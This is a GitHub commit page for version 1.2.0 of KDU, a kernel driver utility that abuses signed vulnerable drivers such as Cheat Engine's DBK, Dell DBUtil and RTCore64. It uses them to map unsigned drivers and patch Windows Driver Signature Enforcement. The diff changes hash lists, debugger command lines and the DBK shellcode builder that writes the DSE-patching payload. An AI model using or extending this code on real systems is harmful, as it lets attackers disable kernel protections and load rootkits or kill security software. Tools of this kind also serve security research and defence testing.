Skip to content

Commit

Permalink
v 1.2.0
Browse files Browse the repository at this point in the history
  • Loading branch information
@hfiref0x
hfiref0x committed Feb 18, 2022
1 parent d7e0714 commit 8fc01fd
Show file tree
Hide file tree
Showing 46 changed files with 396 additions and 388 deletions.
Binary file modified Bin/drv64.dll
View file
Binary file not shown.
Binary file modified Bin/kdu.exe
View file
Binary file not shown.
88 changes: 44 additions & 44 deletions KDU.sha256
View file
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
7e405bf2a4c4b851e7665a37f5b0a791d04f48e9d40ee7a1063db27fb3898709 *Bin\drv64.dll
aaf2ee77582f78ca096c40c6005d83041b8b02b2a89e192ba0c1d419319b752d *Bin\drv64.dll
293cb9a86a3f89e377ef5c6716d70bbdfd9c57ff0a07d484bd8abc1f521e70cc *Bin\dummy.sys
82370b38b940f98013a6506a82c35913ec810f312d93b93b5406f3caf07bda9f *Bin\dummy2.sys
934202b339ecd88418ef2d31061e0ff39eba926907d5a55454dd2bf8de643c50 *Bin\kdu.exe
e18f904ea5a08e9465d6742254a4e67cd65a015924eb33cc9bf0e3da40bac852 *Bin\kdu.exe
751d35646474f1854972d6cc45c5b7419933e36fabe013eba785f276ec566d25 *Bin\license.txt
323d910f93683453d45239a0528d3c3cda7f2608fca864fd2a687184ffe129fe *Help\kdu1.png
a1d7a51549914833a3414a93646952c25deabe072d8a271b54e10727f923b479 *Help\kdu2.png
Expand Down Expand Up @@ -29,43 +29,43 @@ d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\Example
10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\Examples\DummyDrv2\dummy\r3request.c
f12057a99c6b20abf6d9c3df949d794b124ca19b189498ce2beaa5beeb2b077c *Source\Hamakaze\compress.cpp
09fa3cdaa1416b81ba5ee304cf24897726902b9d33a76d879f604b7fe26b4dcc *Source\Hamakaze\compress.h
64b85353dd48547856d1c82af0f8d5bd3387a6599ec67303c64457d8610a9a41 *Source\Hamakaze\consts.h
0be929e99bfa8adafe9f1d54862dfe338d7b178c44807bec4498fca32351b1b4 *Source\Hamakaze\drvmap.cpp
51b0f3cf1352ca13d7ffd4a138082c0552ef29dbc33d72eec9a5ae9aa0ab055f *Source\Hamakaze\consts.h
b6f6af41d17270c3d0ed2dcced45397e37042a2aeff7d803a3eb38b4a242b34c *Source\Hamakaze\drvmap.cpp
2effbb4edc790ac57606a82d3755e26a5a9661884107f474bb3bdd2217bdc260 *Source\Hamakaze\drvmap.h
feabfafd122d6fa542c5113769828f0f44bd1c6c08c8f7731c770a18a41bd8d3 *Source\Hamakaze\dsefix.cpp
d46e3371c568c92493d4a2553327c9a703ccf0b68e26ccc9ed49772524e12b71 *Source\Hamakaze\dsefix.h
7f53d0a7cb3cbd7c63bbb101344bfce7e8498252e0e537c33c1079eb7dc1c63e *Source\Hamakaze\global.h
1e777eaa57e45768c4c318e8264ed5faa4941f56e93ba07456992daf7c8b982e *Source\Hamakaze\ipcsvc.cpp
95d701ca3e4c2ca744208d13e2c52e4956e983bcfcc8dbde45a1997509632244 *Source\Hamakaze\global.h
ea0d8d42a5e7d7fb908c52351f99c69f2019c105d07a1f536756691ab2a74174 *Source\Hamakaze\ipcsvc.cpp
888a436b666b00592d29e8a2e82a9b5c7f0c1d4890aaab8cb2f623181ad07092 *Source\Hamakaze\ipcsvc.h
28852719cb7b5def5cb0667d9de9072f41ea3cd55ef92abf3697a32c487131b1 *Source\Hamakaze\KDU.vcxproj
dd85c4bc40199343726a2a82209713abd1fb41079d1721625d3cd96bc1b33ea6 *Source\Hamakaze\KDU.vcxproj.filters
694256006711a66f650b3a08f7cfc4c45c6fdbf7add49fecf611f5feba2a9f92 *Source\Hamakaze\KDU.vcxproj.user
996a662d691c6cfb46400ec8e75937b84ff160c993e4da0bc5061df9dff85097 *Source\Hamakaze\kduplist.h
1f2f1feb2e97594ad7f03fe82f4db3e69121816431e4579040113c8181b41297 *Source\Hamakaze\kduprov.cpp
19292faca56c6a99eae9869b2194ad768cea46b84e3d9216a6521818b6c0a072 *Source\Hamakaze\kduprov.h
131b328c68ab4fc99172051f3dfc0415431d5aade1b5167ab43e742bda76d885 *Source\Hamakaze\KDU.vcxproj.user
8126b55d26fac45bf920046d4d92c3a83c6075ce864d16f56c532473ff54b37d *Source\Hamakaze\kduplist.h
232d18e2cb1f2ba63a5d269fc315c151f2e592d3c6728aa87aa20d38467986c0 *Source\Hamakaze\kduprov.cpp
d4e42505f96cf1937ce09e2fc49cc27eaee13f16a05226d9e2b41c5d38005362 *Source\Hamakaze\kduprov.h
059074722ee621923d53e036452d24ba401cbed042fa36a896baff2c858f46ae *Source\Hamakaze\main.cpp
e1a8de39e2d3d0bae5d9bbe1b18e849f5d070feb1d37f838176ede5a401f35ec *Source\Hamakaze\pagewalk.cpp
545ecf7e669b6b28753a02e33fae6f503750d26cf0bf9089701f401fd24e0dd1 *Source\Hamakaze\pagewalk.h
c68451b1f7981eefd8ba6e79cb92bc11416c6e942d72bab83bc5096ac853dbd6 *Source\Hamakaze\ps.cpp
6c9e5a15f9d01db4b50ac06b723d4fe9468e2bb02eb8ba77c4bfecf8d83f1f8e *Source\Hamakaze\ps.h
6ab34cc400e37c37605e0b04b076f9464172c6e1ae749b19f7d0c73f2d7177e3 *Source\Hamakaze\resource.h
9816b5d056716f328ad8a13d8d5384dc47b51dbfe4d213abbca2feac6b4cc30c *Source\Hamakaze\resource.rc
6c8175868f7291676b0fe1704f3aff60f7fe2af765fe3ced6a568d182124f499 *Source\Hamakaze\shellcode.cpp
307c1a8c1e9cbc135f981f99859387af3fdd04c928c76654789086d7633ceed1 *Source\Hamakaze\shellcode.h
d9949a96d1fd3cb29ced81adecd840013c4f4ba29e59965de2ca28f0c9197b88 *Source\Hamakaze\shellcode.cpp
37b72edb872268e4e9f8a12853f4cbf726038cf7f0dc5e0f4239888818f18fed *Source\Hamakaze\shellcode.h
3d84a26f0de605c68a84c52bf21103dd90260a43a71dbd7e86f7e290b8fd49bc *Source\Hamakaze\sup.cpp
f85e934795129edb4dd106ab75f8038ccbb064d99ccdb38deb5a50bd839f9be6 *Source\Hamakaze\sup.h
f28306a5b655a37a664169d8a12ab08ac16d4c6521e97a2d8a01136a97cecab9 *Source\Hamakaze\tests.cpp
ad77ae168188a9748713ab5f7532447ca50a539fa8ebbec5ac86b273696b028e *Source\Hamakaze\tests.h
2f9bba7bf761a8e6908132ae93d81aaaa38cbdebd38e2557505ea6309bbd2391 *Source\Hamakaze\victim.cpp
b4165a29658b4770627aaac15bc36add0a47892d738920de1fc6ec73bb1c3cce *Source\Hamakaze\victim.h
329412146007b0520c3d24522768b46f0e0b4d067def7c851e6a0f20309b9624 *Source\Hamakaze\wdksup.h
ef4101bc7311ed538b61e9c3076445e57b03ef6bff731300c2fdb1f9a13cb76d *Source\Hamakaze\wdksup.h
31860c95db21761086e2979753e981d6435f27435dead3ed7e4687e99bb878d4 *Source\Hamakaze\hde\hde64.c
fd5b39e2865e12b9525ebda8fd9e9658b341ead5932d1bcb412a189f81ca42ca *Source\Hamakaze\hde\hde64.h
9d37519623d404987300d3f3258148ba9adddfe1bed5f89a0e9e47646819c9c7 *Source\Hamakaze\hde\pstdint.h
0b6c69ad498e67907e0c574ab06123aee4ec30c99fa181099ea929a8d820bfc1 *Source\Hamakaze\hde\table64.h
b1350783a851e6345b880c8a5313e871d2249aa5524f41406c52fa62483f2229 *Source\Hamakaze\idrv\atszio.cpp
015a6aff991174a881650c61fe1b28c5bfe3116a02a32abe5295ff389c5b7099 *Source\Hamakaze\idrv\atszio.h
c5b615215ed900918986a1309e4d844535e27331246531c3307834cb388597b6 *Source\Hamakaze\idrv\dbk.cpp
5b3b4c565bb77549f6c34ac376a69dfdaa825966ae585fdbd48d022a89de9286 *Source\Hamakaze\idrv\dbk.cpp
24f81b4fdc1b924a36c981fb175b2dccebd7d029d6caed85fb731b74b22c7386 *Source\Hamakaze\idrv\dbk.h
f1e50ca998f4dde600b062fe0f89ba0289b5c69b5636608db95eeb753c444a2a *Source\Hamakaze\idrv\dbutil.cpp
ad955406989b80564e7e4cc400721e62d6d5c193e22037b075e07dd616f3c845 *Source\Hamakaze\idrv\dbutil.h
Expand Down Expand Up @@ -97,8 +97,8 @@ a0ed8a22c14b35bccd1ff0f45c8b23cad0f8c3af1d8e924caf4bfd63dfb02d89 *Source\Hamakaz
3fd20249ff874011dbd7af8d30b9407b2dfcb2791e3e6cd0f9c5e5ddbb2baed1 *Source\Hamakaze\idrv\winring0.cpp
103f50efe410f8668c40ddc68051ba49aa0ee1a5301cb54bc42991523c0edae9 *Source\Hamakaze\idrv\winring0.h
de7bdf0bd4acec31c963b916331399bce23c155e3002f0a8152a4a36af13faf8 *Source\Hamakaze\res\274.ico
f31b9db0c68cd0c4c53fac667e6bd8a1c547f26aee81ed7a9608192d36112543 *Source\Hamakaze\res\SB_SMBUS_SDK.bin
635fdddb536e7be089a3f813f4bb306e9c7220d05d5f19572f296d1c743f1411 *Source\Hamakaze\res\Taigei32.bin
7917b50bc2284aff2ba3a0cdce1a799b60cc89a979dae13d5095ea1c62749a86 *Source\Hamakaze\res\SB_SMBUS_SDK.bin
1a425764ea322118e15130d9f0f5160dc69d58c4adaecc0024abb8c2393f0fd3 *Source\Hamakaze\res\Taigei32.bin
1232f65b57bc8732ead29a730308f6c67bc53a2f9fafd47f8c7cc4b4f676a9e9 *Source\Hamakaze\utils\GenAsIo2Unlock.exe
e0ba365c8aa8e66fddd0f28bca4b827725911480fdcd968df2792c370f13ef42 *Source\Shared\ldr\ldr.cpp
37003367e625e218bf7e4c22850ac7d2efe926a6a832d29bc20a9f8b19a479af *Source\Shared\ldr\ldr.h
Expand Down Expand Up @@ -141,34 +141,34 @@ f0513a122c42de31a0341ab3d0f3d2940f777c91a7e096718d84c83b85a17f77 *Source\Tanikaz
a81e6f2ea101a6f4bd005530bd0d5fd475be1d6bba1e6f45821359cf4a6a09fb *Source\Tanikaze\Tanikaze.vcxproj
2cf945275de0ce48e3e4a438be16a9d27699c39dc15327f731d4e235a3bc265b *Source\Tanikaze\Tanikaze.vcxproj.filters
c06a75b13f855a94d46616796e024c52b499f8f92cf00ccb571ddbc6ff574676 *Source\Tanikaze\Tanikaze.vcxproj.user
e920037c5923d62b4da7c70df62d05a0e341ef19b9c26538de435ae5cec51cf3 *Source\Tanikaze\data\AsusCertService.bin
96835b758e88b9f8d7ec4a9449b32e99eab403c61aba65c13100c2ab63665db6 *Source\Tanikaze\data\dbutilcat.bin
db3ebc1c1aa2779adaedc21480e2ad78ae135a467ad78fa6d48a00575fc0e34c *Source\Tanikaze\data\dbutilinf.bin
ad5544f93b70690e66489bb6c584b28045ed892a2ea8f6149e3ed09dd36bf71b *Source\Tanikaze\data\KMUEXE.bin
a8df0de9fd2f304161038a353bce200fd27009f6bba5dee0eb433a55b9facc6c *Source\Tanikaze\data\KMUSIG.bin
8f37395f31486996e79b29f841efbb8a0b9580a4b24ef352a84b8e09d6e5d8ed *Source\Tanikaze\drv\asio2.bin
d2a3cab1c5acf6b2b45482d80fe78a46bf15ed22f17b088a832d6027f15afb67 *Source\Tanikaze\drv\AsIO3.bin
fa22f886bd2e3e835d009f32dd54e265b41e31e9a44beff66146756c3277c435 *Source\Tanikaze\drv\ATSZIO64.bin
e5459398bf19e711ea13a6289518b4f009557d15b5d0bd0131283e927f1eb8ab *Source\Tanikaze\drv\dbk64.bin
d2653463083e1d0e4ce1a7b3511e554150f1e555c63b13eb69dd9d4b641ee8f5 *Source\Tanikaze\drv\DbUtil2_3.bin
c76d7ab030a6a4265e732914cc730839b4ba3e80ca1050c90fb7721e835829d6 *Source\Tanikaze\drv\dbutildrv2.bin
513d816817728d08b67aee50eb236678e9920b5f2448cff73d75b79d0c96acad *Source\Tanikaze\drv\DirectIo64.bin
6e8b18e64613916bbbb6ff9e0f5a5f1c23d1dbdc84d20ea14e5395a6820a6bb0 *Source\Tanikaze\drv\ene2.bin
2bb48df5ea74f9e12f47cdda225f6cb48727f96d8a2635fa440efb5f58482897 *Source\Tanikaze\drv\EneIo64.bin
66a5b2c8e3b9a61e2b61ce7d37bc33b29684351507a5117f75634227abe044e3 *Source\Tanikaze\drv\EneTechIo64.bin
64d3864dfed46c709a38e3b1083fb715b172fdd9a7e060ff048b57686e2e058b *Source\Tanikaze\drv\gdrv.bin
de7a589bff3665d1a7421fc25806ff1f03538341c543a398f23572ebe5da1a85 *Source\Tanikaze\drv\GLCKIO2.bin
5b8e4905ccf9dea7145ed7bad350a43e8e2c81065b4cb1149a00354f67a15cb3 *Source\Tanikaze\drv\gmerdrv.bin
2c06022ab92311847255f8fcfff7863ab7d464fdc3ea19a943c5e53f87c94bad *Source\Tanikaze\drv\iQVM64.bin
88f31693190a9a50c357ba712bf398c3cffe09de5d64cc00552e7df34fffacc6 *Source\Tanikaze\drv\kprocesshacker.bin
67b46816becc08cdb853f3e2716ef8d8c1e2ff5ca794859b13bd6566735f53e4 *Source\Tanikaze\drv\lha.bin
bff22fa8afabc776a8078af2073ed560c14843654e6feb3133952721f7205e17 *Source\Tanikaze\drv\mimidrv.bin
1115bb6ba845bd4bbbd2b9388f687f164b9838a1dd3941c20cab5e84c36df264 *Source\Tanikaze\drv\MsIo64.bin
2d9d5a641599ad08f2c19125bc4f1976691e95c1a88da45388cd144aba1107bf *Source\Tanikaze\drv\Phymemx64.bin
661491b0c93d27b5960e26aff5c662cb2becec54303890b048e7465d33090178 *Source\Tanikaze\drv\procexp.bin
5c687b2022a107748cdb294dc2d4a478255f69f4bffeef0209803d37a49f6f8d *Source\Tanikaze\drv\RTCore64.bin
e9f5a09e105a05975709bd2ccabf50e5f1cedd2159d42e56f713aba7109bbba8 *Source\Tanikaze\drv\rtkio64.bin
60e15c039544ac6d2d96cbda97af8353c3a5b72d70947dd39add47c2ef91a32a *Source\Tanikaze\drv\WinRing0x64.bin
b394488390e9339e560abef540956fab554ade1418475d1f0b2fa53488e6c884 *Source\Tanikaze\data\AsusCertService.bin
4821448b16dc3280abdc2c2d0e9064c0a59653373594fb0b6f84c03a1504794e *Source\Tanikaze\data\dbutilcat.bin
f09ebf5aff449c68f99926cec4c3bfbcf1617dbdb36d1d3bcca83edb127b4abd *Source\Tanikaze\data\dbutilinf.bin
078bd47739dca4cd7bbee8d56594ea488e5ad3a1cbafe56e5f36c1380d7a396b *Source\Tanikaze\data\KMUEXE.bin
ae2ba42b0f0a10fa945ca7416f764cb8a1e7b52a85f125a020066879cfe93e7b *Source\Tanikaze\data\KMUSIG.bin
654c50b7404069baba71d82b8f21a2cf8dadb3b395641b4ecb0bda47bff05b36 *Source\Tanikaze\drv\asio2.bin
cc06d8e6d743d72cc42ed5bbba0a324c88adda4e3fd6c879a14f24c3ca7c9b1a *Source\Tanikaze\drv\AsIO3.bin
b54f5c1e66ddc4f8f8e98f4f6dff5d24ed7212cf362979436278879eb59a3bf2 *Source\Tanikaze\drv\ATSZIO64.bin
2ab1e575f572462e5e3b3020974978db04069ec267f620935efdbc7b04a67b61 *Source\Tanikaze\drv\dbk64.bin
ee145520e5ea98da0b479a73ad5ad1add995e94ea27a46b1a03364390af13943 *Source\Tanikaze\drv\DbUtil2_3.bin
d783c71d4521fe7df86f9474247aa125cf0bce81fa8822f6acacd17c3547aa23 *Source\Tanikaze\drv\dbutildrv2.bin
753a3d347f7055a704fe06fd112b2b6cfb643556596fbc173070ab412d9855e8 *Source\Tanikaze\drv\DirectIo64.bin
7d2c07e2d1cf9a2637940230c1527f7a71632df4da82ff7a9e6761a3756a4869 *Source\Tanikaze\drv\ene2.bin
f50f906d75eb44129dc3c07ecfde9784f1a939fc8af9dd956e8b54aba7ace212 *Source\Tanikaze\drv\EneIo64.bin
bbc9a758a3ef464ab6a7aa2c9e4a03a34ecdc7ca1007d65484d72c2591d39ffc *Source\Tanikaze\drv\EneTechIo64.bin
ec1a22621f5b2be3a0077a546b22250c362c4e82e84c3edf8f6eb647c248efcc *Source\Tanikaze\drv\gdrv.bin
05ad3f90c6ef313b27c627f6004378bd8c95500b64536702504d9d43ebdc590a *Source\Tanikaze\drv\GLCKIO2.bin
d74c09f50f51915228f207e9d56412f607c5287d7d772a914c94e337f2af8ad0 *Source\Tanikaze\drv\gmerdrv.bin
59b78141995341b19dd9611b8c8224f6c52a7cdce0aed5e83a5c7d0bda0d0861 *Source\Tanikaze\drv\iQVM64.bin
4df9b08915ec1fff8730e96cd7672a4f7544962edc5bcfe9a8e08440f9db6b0a *Source\Tanikaze\drv\kprocesshacker.bin
fef2e03182d98598904e16154838e9a2580dab524c7179dc32e17f81ffdc867b *Source\Tanikaze\drv\lha.bin
8f6750747d721e51d91d1bba2d23631873adf07cec504b55a37585947b3db65c *Source\Tanikaze\drv\mimidrv.bin
40b689b5bbb6da0ed6f8c56eac5945d005314b93004aac39739b32fdda78b473 *Source\Tanikaze\drv\MsIo64.bin
e5e39880ad0162cc0c793ec52495a621a9811f118a2196d3607899368d243ff9 *Source\Tanikaze\drv\Phymemx64.bin
2974c05b4a43e4900d6185d82328fe1fa8700818b8e46ca49a25092a72627a18 *Source\Tanikaze\drv\procexp.bin
b9e53910ad1ea540c2a569f7b355fc390cf2a417ee4308a99829850d51eb5cf2 *Source\Tanikaze\drv\RTCore64.bin
ba8f9fca461a049d11488aff5ec5c606f74dc8648ae17063f249e93980e93823 *Source\Tanikaze\drv\rtkio64.bin
fc833f42ef6fa84bed9f9cabbfc90f700fc5245c8e2ef1fd397906d0c6227617 *Source\Tanikaze\drv\WinRing0x64.bin
bf86c929ee9ee2bb88187e1d82bcddfe83375c73e6787b83a7e414dff691e35b *Source\Utils\readme.txt
c776bc97ee2fbe48d3e148bb37c887862e6de212d4391d6df9b5f149e40ed223 *Source\Utils\GenAsIo2Unlock\GenAsIo2Unlock.sln
c4a28bc43a63a40ff2d8699fa261ee1ced6783d199043484ea7921e8d078ea08 *Source\Utils\GenAsIo2Unlock\GenAsIo2Unlock.vcxproj
Expand Down
2 changes: 1 addition & 1 deletion README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -119,7 +119,7 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware
| 19 | Microsoft | ProcExp152 | Process Explorer | Original | 1.5.2 and below |
| 20 | Dell | DBUtilDrv2 | Dell BIOS Utility | Original | 2.7 and below |
| 21 | DarkByte | Dbk64 | Cheat Engine | Original | 7.4 and below |
| 22 | ASUSTeK | AsIO3 | ASUS GPU Tweak II / III | WINIO | 2.3.0.3 |
| 22 | ASUSTeK | AsIO3 | ASUS GPU Tweak II/III | WINIO | 2.3.0.3 |

More providers maybe added in the future.

Expand Down
4 changes: 2 additions & 2 deletions Source/Hamakaze/KDU.vcxproj.user
View file
Original file line number Diff line number Diff line change
@@ -1,11 +1,11 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LocalDebuggerCommandArguments>-test</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>-prv 21 -scv 4 -map c:\makeexe\kdu\bin\dummy.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LocalDebuggerCommandArguments>-prv 21 -dse 6</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>-prv 22 -map c:\makeexe\kdu\bin\dummy.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>
2 changes: 1 addition & 1 deletion Source/Hamakaze/consts.h
View file
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@
*
* VERSION: 1.20
*
* DATE: 10 Feb 2022
* DATE: 15 Feb 2022
*
* Global consts.
*
Expand Down
1 change: 1 addition & 0 deletions Source/Hamakaze/drvmap.cpp
View file
Original file line number Diff line number Diff line change
Expand Up @@ -407,6 +407,7 @@ PVOID KDUSetupShellCode(
}

printf_s("[+] Ntoskrnl.exe mapped at 0x%llX\r\n", KernelImage);
Context->NtOsMappedBase = KernelImage;

//
// Prepare and store payload for later shellcode use.
Expand Down
2 changes: 1 addition & 1 deletion Source/Hamakaze/global.h
View file
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@
*
* VERSION: 1.20
*
* DATE: 10 Feb 2022
* DATE: 15 Feb 2022
*
* Common include header file.
*
Expand Down
58 changes: 21 additions & 37 deletions Source/Hamakaze/idrv/dbk.cpp
View file
Original file line number Diff line number Diff line change
Expand Up @@ -6,7 +6,7 @@
*
* VERSION: 1.20
*
* DATE: 14 Feb 2022
* DATE: 16 Feb 2022
*
* Cheat Engine's DBK driver routines.
*
Expand Down Expand Up @@ -36,7 +36,7 @@
#define DBK_SC_MAX_SIZE PAGE_SIZE
#define DBK_SHELLCODE_CI_PAYLOAD_SIZE DBK_SC_MAX_SIZE -\
DBK_INIT_CODE_SIZE - \
sizeof(PVOID) - \
sizeof(PULONG_PTR) - \
sizeof(ULONG_PTR)

typedef struct _DBK_SHELLCODE_CI {
Expand All @@ -62,7 +62,7 @@ VOID WINAPI DbkDsePatchRoutine(
}

/*
* DbkpBuildShellCode
* DbkpBuildShellCodeDsePatch
*
* Purpose:
*
Expand All @@ -76,6 +76,8 @@ BOOL DbkpBuildShellCodeDsePatch(
)
{
ULONG procSize, maxSize;
PVOID pvInitCode;
ULONG initSize = 0;

procSize = ScSizeOfProc((BYTE*)DbkDsePatchRoutine);
maxSize = DBK_SHELLCODE_CI_PAYLOAD_SIZE;
Expand All @@ -91,40 +93,22 @@ BOOL DbkpBuildShellCodeDsePatch(
#endif
}

memcpy(ShellCode->Payload, DbkDsePatchRoutine, procSize);

memset(ShellCode->InitCode, 0xCC, sizeof(DBK_INIT_CODE_SIZE));

// 00 call +5
// 05 pop rcx
// 06 sub rcx, 5
// 0A jmps 10
// 0B int 3
// 0C int 3
// 0D int 3
// 0E int 3
// 0F int 3
// 10 code

//call +5
ShellCode->InitCode[0x0] = 0xE8;
ShellCode->InitCode[0x1] = 0x00;
ShellCode->InitCode[0x2] = 0x00;
ShellCode->InitCode[0x3] = 0x00;
ShellCode->InitCode[0x4] = 0x00;

//pop rcx
ShellCode->InitCode[0x5] = 0x59;

//sub rcx, 5
ShellCode->InitCode[0x6] = 0x48;
ShellCode->InitCode[0x7] = 0x83;
ShellCode->InitCode[0x8] = 0xE9;
ShellCode->InitCode[0x9] = 0x05;

// jmps
ShellCode->InitCode[0xA] = 0xEB;
ShellCode->InitCode[0xB] = 0x04;
RtlCopyMemory(ShellCode->Payload, DbkDsePatchRoutine, procSize);
RtlFillMemory(ShellCode->InitCode, sizeof(ShellCode->InitCode), 0xCC);

pvInitCode = ScGetBootstrapLdr(KDU_SHELLCODE_V4, &initSize);

if (initSize > DBK_INIT_CODE_SIZE) {

supPrintfEvent(kduEventError,
"[!] Loader code size 0x%lX exceeds limit 0x%lX, abort\r\n",
initSize,
DBK_INIT_CODE_SIZE);

return FALSE;
}

RtlCopyMemory(ShellCode->InitCode, pvInitCode, initSize);

ShellCode->AddressOfVariable = (PULONG_PTR)Address;
ShellCode->ValueToWrite = Value;
Expand Down
Loading

0 comments on commit 8fc01fd

Please sign in to comment.